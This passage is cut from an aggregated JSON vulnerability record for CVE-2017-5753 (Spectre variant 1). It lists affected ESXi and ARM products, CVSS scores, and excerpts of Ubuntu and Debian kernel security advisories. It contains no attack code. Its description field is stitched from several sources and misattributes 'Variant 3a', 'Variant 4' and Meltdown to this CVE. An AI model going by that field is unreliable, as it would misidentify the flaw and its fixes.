"cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601404:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201601405:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201602401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603201:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603202:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603203:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603204:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603205:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603206:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603207:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201603208:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201605401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608404:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201608405:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201610410:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201611401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201611402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201611403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702201:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702202:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702203:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702204:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702205:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702206:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702207:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702208:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702209:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702210:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702211:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201702212:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201703401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706103:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706401:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706402:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201706403:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201710301:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201701001:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201703001:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201703002:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201704001:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707102:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707103:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707201:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707202:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707203:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707204:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707205:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707206:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707207:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707208:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707209:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707210:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707211:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707212:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707213:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707214:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707215:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707216:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707217:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707218:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707219:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707220:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201707221:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201710001:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.5:650-201712001:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a77_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a77:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a78_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a78:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a78ae_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a78ae:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:neoverse_n1_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:neoverse_n1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:neoverse_n2_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:neoverse_n2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-x1_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-x1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2017-5753" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "145718" }, { "db": "PACKETSTORM", "id": "145641" }, { "db": "PACKETSTORM", "id": "145666" }, { "db": "PACKETSTORM", "id": "146315" }, { "db": "PACKETSTORM", "id": "145635" } ], "trust": 0.5 }, "cve": "CVE-2017-5753", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.7, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.4, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 4.7, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.4, "id": "CNVD-2018-00304", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.7, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.4, "id": "VHN-113956", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:L/AC:M/AU:N/C:C/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "LOCAL", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.1, "impactScore": 4.0, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" } ], "severity": [ { "author": "NVD", "id": "CVE-2017-5753", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2018-00304", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-113956", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-00304" }, { "db": "VULHUB", "id": "VHN-113956" }, { "db": "NVD", "id": "CVE-2017-5753" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. Two vulnerabilities are identified, known as \"Variant 3a\" and \"Variant 4\". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Meltdown vulnerability exists in the CPU processor core, which \\\"melts\\\" the security boundary implemented by hardware, allowing low-privileged user-level applications to \\\"cross-border\\\" access to system-level memory, causing data leakage. Multiple CPU Hardware are prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may aid in further attacks. The following products and versions are affected: ARM Cortex-R7; Cortex-R8; Cortex-A8; Cortex-A9; Cortex-A12; Xeon CPU E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4 ; Xeon E3-1245 v2, v3, v5, v6 versions; Xeon X7542, etc. Relevant releases/architectures:\n\nImage Updates for RHV-H - noarch\n\n3. These\npackages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n==========================================================================\nUbuntu Security Notice USN-3540-2\nJanuary 23, 2018\n\nlinux-lts-xenial, linux-aws vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were addressed in the Linux kernel. This update provides the corresponding updates for the\nLinux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\nUbuntu 14.04 LTS. This flaw is known as Spectre. \n(CVE-2017-5715, CVE-2017-5753)\n\nUSN-3522-2 mitigated CVE-2017-5754 (Meltdown) for the amd64\narchitecture in the Linux Hardware Enablement (HWE) kernel from Ubuntu\n16.04 LTS for Ubuntu 14.04 LTS. This flaw is known as Meltdown. (CVE-2017-5754)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n linux-image-4.4.0-1011-aws 4.4.0-1011.11\n linux-image-4.4.0-111-generic 4.4.0-111.134~14.04.1\n linux-image-4.4.0-111-lowlatency 4.4.0-111.134~14.04.1\n linux-image-4.4.0-111-powerpc-e500mc 4.4.0-111.134~14.04.1\n linux-image-4.4.0-111-powerpc-smp 4.4.0-111.134~14.04.1\n linux-image-4.4.0-111-powerpc64-emb 4.4.0-111.134~14.04.1\n linux-image-4.4.0-111-powerpc64-smp 4.4.0-111.134~14.04.1\n linux-image-aws 4.4.0.1011.11\n linux-image-generic-lts-xenial 4.4.0.111.95\n linux-image-lowlatency-lts-xenial 4.4.0.111.95\n linux-image-powerpc-e500mc-lts-xenial 4.4.0.111.95\n linux-image-powerpc-smp-lts-xenial 4.4.0.111.95\n linux-image-powerpc64-emb-lts-xenial 4.4.0.111.95\n linux-image-powerpc64-smp-lts-xenial 4.4.0.111.95\n\nPlease note that fully mitigating CVE-2017-5715 (Spectre Variant 2)\nrequires corresponding processor microcode/firmware updates or,\nin virtual environments, hypervisor updates. Ubuntu is working with Intel and AMD to provide\nfuture microcode updates that implement IBRS and IBPB as they are made\navailable. Ubuntu users with a processor from a different vendor should\ncontact the vendor to identify necessary firmware updates. Ubuntu\nwill provide corresponding QEMU updates in the future for users of\nself-hosted virtual environments in coordination with upstream QEMU. \nUbuntu users in cloud environments should contact the cloud provider\nto confirm that the hypervisor has been updated to expose the new\nCPU features to virtual machines. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4187-1 security@debian.org\nhttps://www.debian.org/security/ Ben Hutchings\nMay 01, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2015-9016 CVE-2017-0861 CVE-2017-5715 CVE-2017-5753\n CVE-2017-13166 CVE-2017-13220 CVE-2017-16526 CVE-2017-16911\n CVE-2017-16912 CVE-2017-16913 CVE-2017-16914 CVE-2017-18017\n CVE-2017-18203 CVE-2017-18216 CVE-2017-18232 CVE-2017-18241\n CVE-2018-1066 CVE-2018-1068 CVE-2018-1092 CVE-2018-5332\n CVE-2018-5333 CVE-2018-5750 CVE-2018-5803 CVE-2018-6927\n CVE-2018-7492 CVE-2018-7566 CVE-2018-7740 CVE-2018-7757\n CVE-2018-7995 CVE-2018-8781 CVE-2018-8822 CVE-2018-1000004\n CVE-2018-1000199\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks. \n\nCVE-2015-9016\n\n Ming Lei reported a race condition in the multiqueue block layer\n (blk-mq). On a system with a driver using blk-mq (mtip32xx,\n null_blk, or virtio_blk), a local user might be able to use this\n for denial of service or possibly for privilege escalation. \n\nCVE-2017-0861\n\n Robb Glasser reported a potential use-after-free in the ALSA (sound)\n PCM core. We believe this was not possible in practice. \n\nCVE-2017-5715\n\n Multiple researchers have discovered a vulnerability in various\n processors supporting speculative execution, enabling an attacker\n controlling an unprivileged process to read memory from arbitrary\n addresses, including from the kernel and all other processes\n running on the system. \n\n This specific attack has been named Spectre variant 2 (branch\n target injection) and is mitigated for the x86 architecture (amd64\n and i386) by using the \"retpoline\" compiler feature which allows\n indirect branches to be isolated from speculative execution. \n\nCVE-2017-5753\n\n Multiple researchers have discovered a vulnerability in various\n processors supporting speculative execution, enabling an attacker\n controlling an unprivileged process to read memory from arbitrary\n addresses, including from the kernel and all other processes\n running on the system. \n\n This specific attack has been named Spectre variant 1\n (bounds-check bypass) and is mitigated by identifying vulnerable\n code sections (array bounds checking followed by array access) and\n replacing the array access with the speculation-safe\n array_index_nospec() function. \n\n More use sites will be added over time. \n\nCVE-2017-13166\n\n A bug in the 32-bit compatibility layer of the v4l2 ioctl handling\n code has been found. Memory protections ensuring user-provided\n buffers always point to userland memory were disabled, allowing\n destination addresses to be in kernel space. On a 64-bit kernel a\n local user with access to a suitable video device can exploit this\n to overwrite kernel memory, leading to privilege escalation. \n\nCVE-2017-13220\n\n Al Viro reported that the Bluetooth HIDP implementation could\n dereference a pointer before performing the necessary type check. \n A local user could use this to cause a denial of service. \n\nCVE-2017-16526\n\n Andrey Konovalov reported that the UWB subsystem may dereference\n an invalid pointer in an error case. A local user might be able\n to use this for denial of service. \n\nCVE-2017-16911\n\n Secunia Research reported that the USB/IP vhci_hcd driver exposed\n kernel heap addresses to local users. \n\nCVE-2017-16912\n\n Secunia Research reported that the USB/IP stub driver failed to\n perform a range check on a received packet header field, leading\n to an out-of-bounds read. A remote user able to connect to the\n USB/IP server could use this for denial of service. \n\nCVE-2017-16913\n\n Secunia Research reported that the USB/IP stub driver failed to\n perform a range check on a received packet header field, leading\n to excessive memory allocation. A remote user able to connect to\n the USB/IP server could use this for denial of service. \n\nCVE-2017-16914\n\n Secunia Research reported that the USB/IP stub driver failed to\n check for an invalid combination of fields in a received packet,\n leading to a null pointer dereference. A remote user able to\n connect to the USB/IP server could use this for denial of service. \n\nCVE-2017-18017\n\n Denys Fedoryshchenko reported that the netfilter xt_TCPMSS module\n failed to validate TCP header lengths, potentially leading to a\n use-after-free. If this module is loaded, it could be used by a\n remote attacker for denial of service or possibly for code\n execution. \n\nCVE-2017-18203\n\n Hou Tao reported that there was a race condition in creation and\n deletion of device-mapper (DM) devices. A local user could\n potentially use this for denial of service. \n\nCVE-2017-18216\n\n Alex Chen reported that the OCFS2 filesystem failed to hold a\n necessary lock during nodemanager sysfs file operations,\n potentially leading to a null pointer dereference. A local user\n could use this for denial of service. \n\nCVE-2017-18232\n\n Jason Yan reported a race condition in the SAS (Serial-Attached\n SCSI) subsystem, between probing and destroying a port. This\n could lead to a deadlock. A physically present attacker could\n use this to cause a denial of service. \n\nCVE-2017-18241\n\n Yunlei He reported that the f2fs implementation does not properly\n initialise its state if the \"noflush_merge\" mount option is used. \n A local user with access to a filesystem mounted with this option\n could use this to cause a denial of service. \n\nCVE-2018-1066\n\n Dan Aloni reported to Red Hat that the CIFS client implementation\n would dereference a null pointer if the server sent an invalid\n response during NTLMSSP setup negotiation. This could be used\n by a malicious server for denial of service. \n\nCVE-2018-1068\n\n The syzkaller tool found that the 32-bit compatibility layer of\n ebtables did not sufficiently validate offset values. On a 64-bit\n kernel, a local user with the CAP_NET_ADMIN capability (in any user\n namespace) could use this to overwrite kernel memory, possibly\n leading to privilege escalation. Debian disables unprivileged user\n namespaces by default. \n\nCVE-2018-1092\n\n Wen Xu reported that a crafted ext4 filesystem image would\n trigger a null dereference when mounted. A local user able\n to mount arbitrary filesystems could use this for denial of\n service. \n\nCVE-2018-5332\n\n Mohamed Ghannam reported that the RDS protocol did not\n sufficiently validate RDMA requests, leading to an out-of-bounds\n write. A local attacker on a system with the rds module loaded\n could use this for denial of service or possibly for privilege\n escalation. \n\nCVE-2018-5333\n\n Mohamed Ghannam reported that the RDS protocol did not properly\n handle an error case, leading to a null pointer dereference. A\n local attacker on a system with the rds module loaded could\n possibly use this for denial of service. \n\nCVE-2018-5750\n\n Wang Qize reported that the ACPI sbshc driver logged a kernel heap\n address. \n\nCVE-2018-5803\n\n Alexey Kodanev reported that the SCTP protocol did not range-check\n the length of chunks to be created. A local or remote user could\n use this to cause a denial of service. \n\nCVE-2018-6927\n\n Li Jinyue reported that the FUTEX_REQUEUE operation on futexes did\n not check for negative parameter values, which might lead to a\n denial of service or other security impact. \n\nCVE-2018-7492\n\n The syzkaller tool found that the RDS protocol was lacking a null\n pointer check. A local attacker on a system with the rds module\n loaded could use this for denial of service. \n\nCVE-2018-7566\n\n Fan LongFei reported a race condition in the ALSA (sound)\n sequencer core, between write and ioctl operations. This could\n lead to an out-of-bounds access or use-after-free. A local user\n with access to a sequencer device could use this for denial of\n service or possibly for privilege escalation. \n\nCVE-2018-7740\n\n Nic Losby reported that the hugetlbfs filesystem\u0027s mmap operation\n did not properly range-check the file offset. A local user with\n access to files on a hugetlbfs filesystem could use this to cause\n a denial of service. \n\nCVE-2018-7757\n\n Jason Yan reported a memory leak in the SAS (Serial-Attached\n SCSI) subsystem. A local user on a system with SAS devices\n could use this to cause a denial of service. \n\nCVE-2018-7995\n\n Seunghun Han reported a race condition in the x86 MCE\n (Machine Check Exception) driver. This is unlikely to have\n any security impact. \n\nCVE-2018-8781\n\n Eyal Itkin reported that the udl (DisplayLink) driver\u0027s mmap\n operation did not properly range-check the file offset. A local\n user with access to a udl framebuffer device could exploit this to\n overwrite kernel memory, leading to privilege escalation. \n\nCVE-2018-8822\n\n Dr Silvio Cesare of InfoSect reported that the ncpfs client\n implementation did not validate reply lengths from the server. An\n ncpfs server could use this to cause a denial of service or\n remote code execution in the client. \n\nCVE-2018-1000004\n\n Luo Quan reported a race condition in the ALSA (sound) sequencer\n core, between multiple ioctl operations. This could lead to a\n deadlock or use-after-free. A local user with access to a\n sequencer device could use this for denial of service or possibly\n for privilege escalation. \n\nCVE-2018-1000199\n\n Andy Lutomirski discovered that the ptrace subsystem did not\n sufficiently validate hardware breakpoint settings. Local users\n can use this to cause a denial of service, or possibly for\n privilege escalation, on x86 (amd64 and i386) and possibly other\n architectures. \n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.56-1. \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP 